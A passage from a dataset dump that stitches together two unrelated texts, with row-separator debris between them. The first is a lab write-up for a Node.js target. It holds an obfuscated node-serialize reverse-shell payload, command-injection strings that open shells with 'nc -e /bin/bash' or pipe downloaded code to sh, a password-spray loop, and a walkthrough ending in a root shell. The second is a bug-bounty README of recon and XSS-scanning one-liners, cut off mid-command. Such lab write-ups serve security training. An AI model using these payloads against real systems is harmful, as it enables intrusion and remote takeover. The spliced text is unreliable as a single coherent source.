MzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKQ==\nConnection: close\n\n{\"color-theme\":\"dark\"}\n```\n\n### Custom 2\nExploit part 1.\n```bash\n{\"rce\":\"_$$ND_FUNC$$_function ()\n {\n # payload goes here\n }()\"\n}\n```\n\nExploit part 2.\n```bash\n{\"rce\":\"_$$ND_FUNC$$_function (){\neval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()\"\n}\n```\n\nExploit part 3.\n```bash\necho 'javascript' | base64 -w0\n```\n\nExploit part 4.\n```bash\nprofile='payload'\n```\n\n### Custom 3\n```bash\n# login using dev-acct:password\n# fire-up FoxyProxy\n# toggle color-theme\n# add the following to the web-request \"admin\":\"true\"\n# forward the request\n# reload the page\n# forward the request\n# verify you have the Backup logs function on the screen now\n# put \"test\" in the text-box and forward to Intruder\n# use Sniper to try different command injection options\n\n& payload & # doesn't like forward slashes (encoded or not)\n\n# tried\nping -c2 192.168.49.132 # this works\nwget http://192.168.49.132/test.txt # no query seen by tcpdump (slash is filtered)\ncurl http://192.168.49.132/test.txt # no query seen by tcpdump (slash is filtered)\nnc 192.168.49.132 443 # no query seen by tcpdump\necho 'foo' | base64 # response code: 200\necho 'foo:bar' # response code: 200\nuseradd dork -g root # response code: 200\necho -e \"password\\npassword\" | passwd dork # response code: 200\n\necho -n 'wget http://192.168.49.83' | od -A n -t x1 | sed 's/ /\\\\x/g'\n# output is hex\n\n# use this as the payload\necho -e '\\x77\\x67\\x65\\x74\\x20\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x34\\x39\\x2e\\x38\\x33' | sh\n```\n\n# Solution\n```bash\n# login using dev-acct:password\n# fire-up FoxyProxy\n# toggle color-theme\n# add the following to the web-request \"admin\":\"true\"\n# forward the request\n# reload the page\n# forward the request\n# verify you have the Backup logs function on the screen now\n\n# clicked-on 'Backup logs' button\n# captured HTTP request using Burp Suite\n# sent HTTP request to Intruder\n# cleared all assumed positions\n# used this ...filename=$$ for the position\n# created a file with the lines below and loaded the file (under the Payload tab)\n# fired-up a Netcat session for port 80\n\n& ping -c2 192.168.49.198 &\n& wget http://192.168.49.198/ &\n& curl http://192.168.49.198/ &\n& nc 192.168.49.198 -e '/bin/bash' 80 &\n\nuname -a\n\n# output\nLinux interface 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux\n```\n\n# Explore\nNSTR\n\n# Escalate\nNSTR\n\n# Lessons Learned\n* If LFI, RFI, SQLi fails try Command Injection via Intruder from the Burp Suite\n* Getting a 500 HTTP Server code is not always bad\n* Use Patator for brute-forcing HTTP login forms that contain/require JSON\n* If you see a JSON-relevant page (like /api/settings or /api/users) follow it for enumeration purposes\n* In big username/password dumps, look for entries that stand out: dev, dev-acct, admin, test\n* Sort and scrub wordlists for unique values\n* Helpful tools: Patator, Burp Suite Intruder\n* Dirb eventually found the /api/backup page (function); this should have been an indicator in itself\n\n# Walkthrough\n## Hints\n- Enumeration: Can you view all the users?\n- Password Bruteforce: Try spraying with very common passwords.\n- Remote Code Execution: You could try injecting something... \n\n## Exploitation Guide\n```bash\nSummary\n\nWe’ll brute-force user credentials in a NodeJS web application to gain a foothold on this target. We’ll then exploit an OS command injection vulnerability in the same application to obtain a root shell.\nEnumeration\nNmap\n\nLet’s begin with a simple nmap TCP scan:\n\nkali@kali:~$ sudo nmap -p- 192.168.120.127\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 12:05 EDT\nNmap scan report for 192.168.120.127\nHost is up (0.031s latency).\nNot shown: 65533 closed ports\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n\nWe’ll further scan the application on port 80 in an attempt to further identify the server type.\n\nkali@kali:~$ sudo nmap -p 80 192.168.120.127 -sV\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 12:08 EDT\nNmap scan report for 192.168.120.127\nHost is up (0.031s latency).\n\nPORT STATE SERVICE VERSION\n80/tcp open http Node.js Express framework\n\nThis appears to be a web server running NodeJS Express.\nWeb Enumeration\n\nLet’s set up the web browser to use Burp proxy to help identify the exact requests the front-end interface is making to the server. After visiting the default web page (http://192.168.120.127/), we observe the following:\n\n a GET request is sent to /api/settings that results in HTTP/1.1 401 Unauthorized\n a GET request is sent to /api/users that results in HTTP/1.1 200 OK\n\nThe page also contains a list of “Top Users”:\n\n1. zachery\n2. burt\n3. mary\n4. evan\n5. clare\n6. rickie\n7. orlando\n8. twila\n9. zachariah\n10. joy \n\nWhen we click on the Dark button, we observe the following POST request:\n\nPOST /api/settings HTTP/1.1\nHost: 192.168.120.127\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 22\nOrigin: http://192.168.120.127\nConnection: close\nReferer: http://192.168.120.127/\n\n{\"color-theme\":\"dark\"}\n\nThe response is as follows:\n\nHTTP/1.1 401 Unauthorized\nX-Powered-By: Express\nContent-Type: text/plain; charset=utf-8\nContent-Length: 12\nETag: W/\"c-dAuDFQrdjS3hezqxDTNgW7AOlYk\"\nDate: Mon, 12 Oct 2020 13:01:47 GMT\nConnection: close\n\nUnauthorized\n\nWe’ll take a note of this information and move on.\nExploitation\nLeaking More Users\n\nNavigating to /api/users, we receive the following response:\n\nHTTP/1.1 304 Not Modified\nX-Powered-By: Express\nETag: W/\"44df-Bn+qiRrYHrX450lifQ2et5+YwdY\"\nDate: Fri, 09 Oct 2020 16:17:56 GMT\nConnection: close\n\nMore importantly, the content includes the application’s entire user list:\n\nkali@kali:~$ curl http://192.168.120.127/api/users\n[\"frieda\",\"delia\",\"luisa\",\"clyde\",\"colby\",\"stephanie\",\"marion\",\"fredric\",\"georgina\",\"flora\",\"jonas\",\n...\n\"amos\",\"tammy\",\"spencer\",\"elma\",\"graciela\",\"lester\",\"eula\",\"dev-acct\",\"shaun\",\"laurie\",\"cedric\",\"rhea\",\n...\n\nPassword Spray\n\nNext, let’s try to log in with test credentials. This provides the following response:\n\nPOST /login HTTP/1.1\nHost: 192.168.120.127\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 37\nOrigin: http://192.168.120.127\nConnection: close\nReferer: http://192.168.120.127/\n\n{\"username\":\"test\",\"password\":\"test\"}\n\nThis generates a failure.\n\nHTTP/1.1 401 Unauthorized\nX-Powered-By: Express\nDate: Fri, 09 Oct 2020 16:21:03 GMT\nConnection: close\nContent-Length: 12\n\nUnauthorized\n\nLet’s password-spray the users with the password of password. We’ll install the jq package to assist with this, capturing the usernames one-per-row:\n\nkali@kali:~$ sudo apt-get install jq -y\nGet:1 http://kali.download/kali kali-rolling/main amd64 libonig5 amd64 6.9.5-2 [182 kB]\nGet:2 http://kali.download/kali kali-rolling/main amd64 libjq1 amd64 1.6-1 [133 kB]\nGet:3 http://kali.download/kali kali-rolling/main amd64 jq amd64 1.6-1 [63.4 kB]\nFetched 378 kB in 1s (444 kB/s)\n...\nkali@kali:~$\n\nNow we can fetch the user list and pipe it into jq:\n\nkali@kali:~$ curl http://192.168.120.127/api/users | jq '.[]' -r > users.txt\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n100 17631 100 17631 0 0 175k 0 --:--:-- --:--:-- --:--:-- 173k\nkali@kali:~$ head users.txt\nfrieda\ndelia\nluisa\nclyde\ncolby\nstephanie\nmarion\nfredric\ngeorgina\nflora\nkali@kali:~$ \n\nWe’ll use a bash script to perform the password spray, using this username list as input.\n\nkali@kali:~$ for user in $(cat users.txt); do curl 'http://192.168.120.127/login' --data \"{\\\"username\\\":\\\"${user}\\\",\\\"password\\\":\\\"password\\\"}\" -H \"Content-Type: application/json\" 2>/dev/null | grep -v Unauthorized && echo $user ; done\nOK\ndev-acct\nkali@kali:~$\n\nImpersonating Admin User\n\nWe are able to login successfully with the dev-acct:password credentials. As we log in to the website with these credentials, the login form disappears, allowing us to further investigate the /api/settings endpoint.\n\nThe Burp history reveals that our POST request to /api/settings now returns a 200 OK instead of 401 Unauthorized. In addition, the POST requests are returning JSON data containing our account settings:\n\n{\"color-theme\":\"light\",\"lang\":\"en\",\"admin\":false}\n\nLet’s click on the Dark button and then forward the captured request to the Repeater tab in Burp. In the body of the request, we’ll append \"admin\":true to the JSON as follows:\n\nPOST /api/settings HTTP/1.1\nHost: 192.168.120.127\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 35\nOrigin: http://192.168.120.127\nConnection: close\nReferer: http://192.168.120.127/\nCookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA\n\n{\"color-theme\":\"dark\",\"admin\":true}\n\nAfter we send this to the server, all subsequent requests now include \"admin\":true. That means that we are now successfully impersonating the admin user in the application.\nCommand Injection\n\nWhen we refresh the page, we discover that we can now perform a backup of the web app’s log files. The interface contains a text field (with the default value of Logbackup), and a Backup Logs button. Leaving the text field blank and clicking the button returns the following:\n\nBackup created\nCreated backup: Created backup: /var/log/app/logfile-undefined.1602522817206.gz\n\nLet’s attempt command injection on this field. For example, we can attempt to instruct the target to send ICMP requests to our attack machine with the following payload:\n\n; ping -c 2 192.168.118.3;\n\nHere’s the request:\n\nGET /api/backup?filename=;%20ping%20-c%202%20192.168.118.3; HTTP/1.1\nHost: 192.168.120.127\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://192.168.120.127/\nCookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA\n\nLet’s run tcpdump, filtering for ICMP packets.\n\nkali@kali:~$ sudo tcpdump -i tap0 icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on tap0, link-type EN10MB (Ethernet), capture size 262144 bytes\n13:03:59.804083 IP 192.168.120.127 > kali: ICMP echo request, id 900, seq 1, length 64\n13:03:59.804276 IP kali > 192.168.120.127: ICMP echo reply, id 900, seq 1, length 64\n13:04:00.806200 IP 192.168.120.127 > kali: ICMP echo request, id 900, seq 2, length 64\n13:04:00.806252 IP kali > 192.168.120.127: ICMP echo reply, id 900, seq 2, length 64\n^C\n4 packets captured\n4 packets received by filter\n4 packets dropped by kernel\nkali@kali:~$ \n\nThis reveals that the target machine indeed pinged our attack machine. We have obtained command injection.\nReverse Shell\n\nLeveraging this command injection vulnerability, let’s attempt to upgrade to a reverse shell. We’ll start a netcat listener on port 4444 and then use the following payload to send the shell:\n\nGET /api/backup?filename=;%20nc%20192.168.118.3%204444%20-e%20/bin/sh; HTTP/1.1\nHost: 192.168.120.127\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://192.168.120.127/\nCookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA\n\nWe receive a shell.\n\nkali@kali:~$ nc -lvp 4444\nlistening on [any] 4444 ...\n192.168.120.127: inverse host lookup failed: Unknown host\nconnect to [192.168.118.3] from (UNKNOWN) [192.168.120.127] 57636\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nroot@interface:/var/www/app/dist# whoami\nwhoami\nroot\nroot@interface:/var/www/app/dist#\n\nNot only have we obtained a shell, but because the web server was misconfigured to run as root, we’ve obtained a root shell!\n```\n"}}},{"rowIdx":675,"cells":{"text":{"kind":"string","value":"

👑 What is KingOfBugBounty Project

\n\nOur main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑\n\n\n## Stats King\n\n![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula)\n\n[![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge)\n\n## Join Us\n\n[![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA)\n[![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah)\n\n## BugBuntu Download \n\n- [BugBuntu](https://sourceforge.net/projects/bugbuntu/)\n- [@bt0s3c](https://twitter.com/bt0s3c)\n- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)\n\n## Special thanks\n\n- [@bt0s3c](https://twitter.com/bt0s3c)\n- [@MrCl0wnLab](https://twitter.com/MrCl0wnLab)\n- [@Stokfredrik](https://twitter.com/stokfredrik)\n- [@Jhaddix](https://twitter.com/Jhaddix)\n- [@pdiscoveryio](https://twitter.com/pdiscoveryio)\n- [@TomNomNom](https://twitter.com/TomNomNom)\n- [@jeff_foley](https://twitter.com/@jeff_foley)\n- [@NahamSec](https://twitter.com/NahamSec)\n- [@j3ssiejjj](https://twitter.com/j3ssiejjj)\n- [@zseano](https://twitter.com/zseano)\n- [@pry0cc](https://twitter.com/pry0cc)\n\n## Scripts that need to be installed\n\nTo run the project, you will need to install the following programs:\n\n- [Amass](https://github.com/OWASP/Amass)\n- [Anew](https://github.com/tomnomnom/anew)\n- [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl)\n- [Assetfinder](https://github.com/tomnomnom/assetfinder)\n- [Axiom](https://github.com/pry0cc/axiom)\n- [CF-check](https://github.com/dwisiswant0/cf-check)\n- [Chaos](https://github.com/projectdiscovery/chaos-client)\n- [Dalfox](https://github.com/hahwul/dalfox)\n- [DNSgen](https://github.com/ProjectAnte/dnsgen)\n- [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved)\n- [Findomain](https://github.com/Edu4rdSHL/findomain)\n- [Fuff](https://github.com/ffuf/ffuf)\n- [Gargs](https://github.com/brentp/gargs)\n- [Gau](https://github.com/lc/gau)\n- [Gf](https://github.com/tomnomnom/gf)\n- [Github-Search](https://github.com/gwen001/github-search)\n- [Gospider](https://github.com/jaeles-project/gospider)\n- [Gowitness](https://github.com/sensepost/gowitness)\n- [Hakrawler](https://github.com/hakluke/hakrawler)\n- [HakrevDNS](https://github.com/hakluke/hakrevdns)\n- [Haktldextract](https://github.com/hakluke/haktldextract)\n- [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool)\n- [Httpx](https://github.com/projectdiscovery/httpx)\n- [Jaeles](https://github.com/jaeles-project/jaeles)\n- [Jsubfinder](https://github.com/hiddengearz/jsubfinder)\n- [Kxss](https://github.com/Emoe/kxss)\n- [LinkFinder](https://github.com/GerbenJavado/LinkFinder)\n- [Metabigor](https://github.com/j3ssie/metabigor)\n- [MassDNS](https://github.com/blechschmidt/massdns)\n- [Naabu](https://github.com/projectdiscovery/naabu)\n- [Qsreplace](https://github.com/tomnomnom/qsreplace)\n- [Rush](https://github.com/shenwei356/rush)\n- [SecretFinder](https://github.com/m4ll0k/SecretFinder)\n- [Shodan](https://help.shodan.io/command-line-interface/0-installation)\n- [ShuffleDNS](https://github.com/projectdiscovery/shuffledns)\n- [SQLMap](https://github.com/sqlmapproject/sqlmap)\n- [Subfinder](https://github.com/projectdiscovery/subfinder)\n- [SubJS](https://github.com/lc/subjs)\n- [Unew](https://github.com/dwisiswant0/unew)\n- [WaybackURLs](https://github.com/tomnomnom/waybackurls)\n- [Wingman](https://xsswingman.com/#faq)\n- [Notify](https://github.com/projectdiscovery/notify)\n- [Goop](https://github.com/deletescape/goop)\n- [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson)\n- [GetJS](https://github.com/003random/getJS)\n- [X8](https://github.com/Sh1Yo/x8)\n- [Unfurl](https://github.com/tomnomnom/unfurl)\n- [XSStrike](https://github.com/s0md3v/XSStrike)\n- [Page-fetch](https://github.com/detectify/page-fetch)\n\n\n### .bashrc shortcut.\n\n```bash\nreconjs(){\ngau -subs $1 |grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt\n}\ncert(){\ncurl -s \"[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | anew\n}\nanubis(){\ncurl -s \"[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | anew\n}\n```\n\n### Running JavaScript on each page send to proxy. \n- [Explained command](https://bit.ly/3daIyFw)\n\n```bash\ncat 200http | page-fetch --javascript '[...document.querySelectorAll(\"a\")].map(n => n.href)' --proxy http://192.168.15.47:8080\n```\n\n\n\n### Dalfox scan to bugbounty targets.\n- [Explained command](https://bit.ly/3nnEhCj)\n\n```bash\nxargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer'\n```\n\n### Dalfox scan to bugbounty targets.\n- [Explained command](https://bit.ly/324Sr1x)\n```bash\nwget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @\n```\n\n### Using x8 to Hidden parameters discovery\n- [Explaining command](https://bit.ly/3w48wl8)\n\n```bash\nassetfinder domain | httpx -silent | sed -s 's/$/\\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate'\n```\n\n### Extract .js Subdomains\n- [Explaining command](https://bit.ly/339CN5p)\n\n```bash\necho \"domain\" | haktrails subdomains | httpx -silent | getJS --complete | anew JS\necho \"domain\" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1\n```\n\n\n### goop to search .git files.\n- [Explaining command](https://bit.ly/3d0VcY5)\n\n```bash\nxargs -a xss -P10 -I@ sh -c 'goop @'\n```\n\n### Using chaos list to enumerate endpoint\n\n```bash\ncurl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @'\n```\n\n### Using Wingman to search XSS reflect / DOM XSS\n\n- [Explaining command](https://bit.ly/3m5ft1g)\n\n```bash\nxargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify'\n\n```\n\n### Search ASN to metabigor and resolvers domain\n\n- [Explaining command](https://bit.ly/3bvghsY)\n\n```bash\necho 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\\+\\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'\n\n```\n\n### OneLiners\n\n### Search .json gospider filter anti-burl\n\n- [Explaining command](https://bit.ly/3eoUhSb)\n\n```bash\ngospider -s https://twitch.tv --js | grep -E \"\\.js(?:onp?)?$\" | awk '{print $4}' | tr -d \"[]\" | anew | anti-burl\n\n```\n\n### Search .json subdomain\n\n- [Explaining command](https://bit.ly/3kZydis)\n\n```bash\nassetfinder http://tesla.com | waybackurls | grep -E \"\\.json(?:onp?)?$\" | anew \n```\n\n### SonarDNS extract subdomains\n\n- [Explaining command](https://bit.ly/2NvXRyv)\n\n```bash\nwget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep \".DOMAIN.com\" | jq .name | tr '\" \" \"' \" / \" | tee -a sonar\n```\n\n### Kxss to search param XSS \n\n- [Explaining command](https://bit.ly/3aaEDHL)\n\n```bash\necho http://testphp.vulnweb.com/ | waybackurls | kxss\n```\n\n\n### Recon subdomains and gau to search vuls DalFox\n\n- [Explaining command](https://bit.ly/3aMXQOF)\n\n```bash\nassetfinder testphp.vulnweb.com | gau | dalfox pipe\n```\n\n\n### Recon subdomains and Screenshot to URL using gowitness\n\n- [Explaining command](https://bit.ly/3aKSSCb)\n\n```bash\nassetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' \n```\n\n\n### Extract urls to source code comments\n\n- [Explaining command](https://bit.ly/2MKkOxm)\n\n```bash\ncat urls1 | html-tool comments | grep -oE '\\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' \n```\n\n### Axiom recon \"complete\"\n\n- [Explaining command](https://bit.ly/2NIavul)\n\n```bash\nfindomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr \",\" \" \" | awk '{print $2}' | fff | grep 200 | sort -u \n```\n\n### Domain subdomain extraction \n\n- [Explaining command](https://bit.ly/3c2t6eG)\n\n```bash\ncat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain'\n\n```\n\n\n### Search .js using \n\n- [Explaining command](https://bit.ly/362LyQF)\n\n```bash\nassetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E \"\\.js(?:onp?)?$\" | anew\n```\n\n\n### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below.\n\n- [Explaining command](https://bit.ly/3sD0pLv)\n\n```bash\ncat dominios | gau |grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\\.js'|grep -iEv '(\\.jsp|\\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo \"(http|https)://[^/\\\"].*\\.js+\" | sed \"s#\\] \\- #\\n#g\" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c \"echo -e '\\n[URL]: @\\n'; python3 linkfinder.py -i @ -o cli\" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS'\n```\n\n\n### My recon automation simple. OFJAAAH.sh\n\n- [Explaining command](https://bit.ly/3nWHM22)\n\n```bash\nchaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1\n```\n\n### Download all domains to bounty chaos\n\n- [Explaining command](https://bit.ly/38wPQ4o)\n\n```bash\ncurl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo 